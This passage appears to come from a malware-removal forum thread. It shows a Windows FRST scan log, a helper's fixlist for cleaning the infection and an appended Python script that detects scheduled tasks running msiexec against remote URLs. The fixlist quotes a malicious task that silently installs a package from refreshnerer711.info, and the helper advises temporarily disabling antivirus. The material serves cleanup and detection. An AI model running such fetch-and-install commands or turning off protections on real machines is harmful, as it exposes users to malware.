2019-02-23 17:11 - 2019-02-23 17:11 - 000157696 _____ (Scarlet.Crush Productions) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\ScpControl.Shared\1530244f6d4734cd7318000018cec0ce\ScpControl.Shared.ni.dll
2019-02-23 17:11 - 2019-02-23 17:11 - 001514496 _____ (dbreeze.tiesky.com) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\DBreeze\4b9b94d758541a664f33eedc4cf794ca\DBreeze.ni.dll
2019-02-23 17:12 - 2019-02-23 17:12 - 000304640 _____ () [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\ReactiveSockets\8056aca6765369aa1a0cd54ecdd4700e\ReactiveSockets.ni.dll
2019-02-23 17:13 - 2019-02-23 17:13 - 000613888 _____ (Illusory Studios LLC) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\HidSharp\85fbaab37682bcc1051729321116aac8\HidSharp.ni.dll
2019-02-23 17:13 - 2019-02-23 17:13 - 000345600 _____ (Benjamin Höglinger) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\Libarius\605a5ff34bac6549bcd91723e384f53b\Libarius.ni.dll
2019-02-23 17:13 - 2019-02-23 17:13 - 002726912 _____ (Newtonsoft) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\Newtonsoft.Json\98f76395a0f44c111fc30f44e1701d4a\Newtonsoft.Json.ni.dll
2019-02-23 17:13 - 2019-02-23 17:13 - 000738816 _____ (Galos) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\CSScriptLibrary\bf5108643b80da885725b4fdbd2a0b39\CSScriptLibrary.ni.dll
2019-02-23 17:14 - 2019-02-23 17:14 - 000157184 _____ (Richard Deeming) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\Trinet.Core.IO.Ntfs\dc952062e8884c3283abec3978eee900\Trinet.Core.IO.Ntfs.ni.dll
2019-02-23 17:14 - 2019-02-23 17:14 - 000276992 _____ (MadMilkman) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\MadMilkman.Ini\c9ddf93eb4e8fcd73ed3b532a671f09d\MadMilkman.Ini.ni.dll
2019-02-23 17:14 - 2019-02-23 17:14 - 005444608 _____ (Mono development team) [File not signed] C:\Windows\assembly\NativeImages_v4.0.30319_64\Mono.CSharp\733e353213affab70c6016a293b211be\Mono.CSharp.ni.dll
2015-08-28 20:16 - 2015-08-28 20:16 - 003496448 _____ (akeo.ie) [File not signed] C:\Program Files\Nefarius Software Solutions\ScpToolkit\libwdi\amd64\libwdi.dll
2013-08-27 14:32 - 2013-08-27 14:32 - 000747520 _____ (Intel(R) Corporation) [File not signed] C:\Program Files\Intel\iCLS Client\HeciServer.exe
2018-11-13 12:59 - 2016-03-21 21:10 - 000842968 _____ (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [File not signed] C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPI64.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2019-02-20 22:00 - 002097614 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\dotnet\;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\
HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: Fax => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: WinDefend => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ScpToolkit Tray Notifications.lnk => C:\Windows\pss\ScpToolkit Tray Notifications.lnk.CommonStartup
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: Discord => C:\Users\Michael\AppData\Local\Discord\app-0.0.304\Discord.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{DDB8CA69-D62B-4B4E-A911-9D564ABEC7A6}] => (Allow) C:\Program Files\Unity\Editor\Unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [{61920AB2-5CED-4165-9184-74A141C5AEC9}] => (Block) C:\Program Files\Unity\Editor\Unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [{9184648B-ED69-4E4C-9AE9-6EF72D0F8F55}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{756D4BBE-8D90-493F-BC6E-A6F29E3E4D43}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D6F47F84-6A50-4A31-9F7C-4BB1070FD40D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{D960CF15-216E-46F5-A6EA-928A6E4983F5}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{453526CF-3245-487C-AFCD-364CE8DAC5C1}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4925A005-2BF8-4853-A804-6263695B632F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C1E50307-4100-4BE1-9D73-C31C59A2EB4D}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{B4BD4A37-2CDF-4472-9EA4-A01E36F92FCF}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{E0C9C79E-82BC-4D82-995E-D2E1810D0932}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{25D51147-50AF-4FC1-8336-CEEFEC1D857C}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0B45B622-A173-468A-9EC0-29030EA1D36B}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{ADEE8CC7-B13B-4FCB-8080-B42F528B4D28}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{5A24A94E-60DB-42E9-BABB-2667E051EB50}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{23ECECA5-8967-4DAD-AAEF-301C8647A2EA}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{21ED4F70-3E28-46FC-853A-477F53F1D71C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{308D67A3-21F2-4A2F-8C34-8B8869FF7DBB}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{51D3CFBC-466C-4393-A5AE-AAFAC4D2E81D}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DB00FBAB-756B-4F9E-87A8-CE86410EC827}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{6F9182EA-DD3A-4019-88CD-60B0426B6DE4}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{B371CF72-1CDC-442D-B4F3-7370A875618F}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{C1DBEECF-93BB-4D61-BD46-D58D336E8EF7}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C274F7D4-BF53-4EED-950A-8E2D19339D7D}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{E8F400D7-60AC-44EB-9BE0-24DC2B8AB008}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D3CC16F0-5CB1-4C98-9578-CD95F3078F17}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C907A5C4-490E-4B25-932C-5E5E5CF0B844}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{AE178F4D-D170-4523-B007-3A44ABCE6298}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6E7020D0-FC1E-4610-BC5D-9F3A9307E01F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{4C06C9DC-8669-4D3A-A689-E5B82ED1CC18}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{133C69C4-FB4F-472E-B7D5-EE5C4777034E}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{8B72B1AD-F2EE-472B-9E1C-71B7D791A24D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9FE7E8B5-44FC-421D-B971-1F8F16ADC567}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{83F860C9-DC64-4DED-A099-4FF46C91DEF2}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D224F60D-B5C2-4D85-A6B2-4FD00621EE4B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{B3EFB7C4-2D6B-4ECF-B27B-58CB1D1AA74A}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{C4A5DA39-8D31-4881-BF9D-CE0C6ABB1855}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{4FA33F81-C75B-4005-86B4-219940670719}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{13F13E49-A60F-4C89-874C-C094F56055DF}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{7E3C248F-3FCE-4B03-9740-60ED500557DA}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{FCEE6EA1-1443-416D-AB32-55578CF25E4A}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{14BE4BEC-7FAB-48AD-AF3A-CA80237F3163}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{8DC237C8-8FC5-407B-9AA3-2A34AF3E26AE}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{FB1B56CD-536B-4F8D-A17D-9FD752B3AD58}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{F1AF2B0E-454C-4792-B758-A710E9913CE1}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{F0245DDE-9F40-4FF4-8ECB-748966ABEA43}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6FF0181D-BEFE-4988-832A-044E01BB5917}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{32B3E73D-F2B4-4BB2-A4CB-E2F8DAC6E4F7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{4C935997-E290-4719-8CD9-022F9C8B96E2}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CDD16B92-A4E6-496A-85AF-514C0BA02BE8}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0419B383-0F77-47B4-9C9C-4674156F4AA2}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{6B343856-13A0-4E59-9F30-2BB732DD6683}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0FFF2A47-540B-475F-8D24-7B5637DA9B10}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5DAFDD8A-0996-4E81-81A9-326FEEEFD7BD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)

==================== Restore Points =========================

ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/01/2019 01:35:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/28/2019 04:59:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/27/2019 05:32:54 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/26/2019 04:24:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/25/2019 10:46:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/25/2019 10:24:38 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/25/2019 08:33:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.

Error: (02/25/2019 08:32:17 PM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: El servicio Windows Search se está deteniendo porque hay un problema con el indizador: The catalog is corrupt.

Detalles:
	El catálogo del índice de contenido está dañado.  (HRESULT : 0xc0041801) (0xc0041801)


System errors:
=============
Error: (02/28/2019 08:43:13 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (02/28/2019 06:53:10 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (02/27/2019 05:43:26 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 40.

Error: (02/27/2019 05:43:26 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 70.

Error: (02/27/2019 05:43:25 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Se recibió la siguiente alerta irrecuperable: 70.

Error: (02/25/2019 11:03:19 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Installer terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (02/25/2019 08:32:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Windows Search terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 30000 milisegundos: Reiniciar el servicio.

Error: (02/25/2019 08:32:17 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: El servicio Windows Search se cerró con el error específico de servicio %%-1073473535.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i5-3570K CPU @ 3.40GHz
Percentage of memory in use: 59%
Total physical RAM: 7644.62 MB
Available physical RAM: 3106.18 MB
Total Virtual: 8154.8 MB
Available Virtual: 3496.22 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:462.1 GB) (Free:347.58 GB) NTFS
Drive d: (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: () (Fixed) (Total:469.31 GB) (Free:246.17 GB) NTFS
Drive f: () (Fixed) (Total:447.03 GB) (Free:49.7 GB) NTFS
Drive h: (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[system with boot components (obtained from drive)]


==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: B29B50F1)
Partition 1: (Not Active) - (Size=469.3 GB) - (Type=07 NTFS)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=462.1 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 447.1 GB) (Disk ID: D8192920)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=447 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
#9

Hello:

Follow these steps:

1.- Very important >>> Make a backup of your Registry.

  • Download DelFix to the Windows desktop.
  • Right-click, “Run as administrator”.
  • In the main window, check only the “Create Registry Backup” box.
  • Click Run.

When it finishes, a report named DelFix.txt will open; save it in case it is needed and close the tool…

2.- Temporarily disable your antivirus.

3.- Open a new Notepad file and copy and paste this content:


Start
CloseProcesses:
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
2019-02-20 23:03 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\mwp5plgzgye
2019-02-20 22:58 - 2019-02-20 22:58 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ytvjbkdd0kq
2019-02-20 22:26 - 2019-02-25 20:19 - 000000000 ____D C:\Windows\SysWOW64\qhpduwip
2019-02-20 22:26 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\5fgtl00uoz1
2019-02-20 22:20 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ex5jjx0e11b
2019-02-20 22:07 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\xazbrsguaeb
2019-02-20 22:03 - 2019-02-20 22:03 - 000003578 _____ C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150}
2019-02-20 22:03 - 2019-02-20 22:03 - 000003472 _____ C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{B3627947-F7BF-ABF0-C7EA-7327C70D2A76}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{1CDD8693-086B-044F-1315-CC8813F295D9}
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1028
2019-02-25 23:03 - 2019-02-28 20:43 - 000000000 ____D () C:\Users\Michael\AppData\Local\Temp\ImagingEngine.dll
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
Task: {36862642-B4E0-4EE1-8C8A-BAB564791EF6} - System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150} => "msiexec" -q -i hxxps://refreshnerer711.info/mp2FA19Hb.GWj <==== ATTENTION
Task: {5D11E411-A841-43AC-AF9A-BFF0D70F52BB} - System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863} => C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe
C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe

CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
RemoveProxy:
EmptyTemp:
Hosts:
END
  • Save it as fixlist.txt on the desktop <<< This is very important.

Note: The Frst.exe executable and fixlist.txt must be in the same location (the desktop), otherwise the tool will not work.

  • Run Frst.exe.
  • Press the Fix button and wait for it to finish.
  • The tool will save the report on your desktop (Fixlog.txt).
  • Paste it in your next reply.

Let us know.

Regards.
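
Added example, not part of the original thread and not FRST's own code: a Python triage pass over FRST `Task:` lines shaped like the two in the fixlist above, flagging scheduled tasks whose action runs msiexec against a remote URL and tasks named with a bare GUID. The sample lines, their GUIDs and the `example.invalid` host are constructed, and the line layout is assumed from the entries shown in this thread.

```python
import re

# Assumed layout, taken from the "Task:" entries quoted in this thread:
#   Task: {task-id} - System32\Tasks\<name> => <action> [<==== ATTENTION]
TASK_RE = re.compile(
    r'^Task:\s*(?P<id>\{[0-9A-Fa-f-]{36}\})\s+-\s+'
    r'(?P<path>\S.*?)\s+=>\s+(?P<action>.*?)'
    r'(?:\s*<====\s*ATTENTION)?\s*$'
)
# Task whose file name is nothing but a GUID in braces.
GUID_NAME_RE = re.compile(
    r'^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$')
# Action starts with msiexec, quoted or not, with or without a directory.
MSIEXEC_RE = re.compile(r'^"?(?:[^"]*\\)?msiexec(?:\.exe)?"?(?=\s|$)', re.I)
# http(s) URL, also in the defanged hxxp(s) form used in forum posts.
URL_RE = re.compile(r'\bh(?:tt|xx)ps?://\S+', re.I)
# msiexec quiet switches: /q, /qn, /qb, /qr, /quiet (or with a dash).
QUIET_RE = re.compile(r'(?:^|\s)[/-]q(?:uiet|[nbr])?\b', re.I)


def triage(report_text):
    """Return one finding per suspicious Task: line in an FRST report."""
    findings = []
    for line in report_text.splitlines():
        m = TASK_RE.match(line.strip())
        if not m:
            continue  # not a Task: entry
        name = m.group('path').rsplit('\\', 1)[-1]
        action = m.group('action').strip()
        reasons = []
        # Weak signal on its own: review it, do not delete on this alone.
        if GUID_NAME_RE.match(name):
            reasons.append('guid_name')
        # Strong signal: the task makes Windows Installer fetch a package
        # from the network each time it fires.
        if MSIEXEC_RE.match(action) and URL_RE.search(action):
            reasons.append('msiexec_remote_url')
            if QUIET_RE.search(action):
                reasons.append('quiet_install')  # no UI shown to the user
        if reasons:
            findings.append({'task_id': m.group('id'), 'name': name,
                             'action': action, 'reasons': reasons})
    return findings


# Constructed sample input (not taken from any real machine).
SAMPLE = r'''
Task: {11111111-2222-3333-4444-555555555555} - System32\Tasks\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE} => "msiexec" -q -i hxxps://updates.example.invalid/pkg.msi <==== ATTENTION
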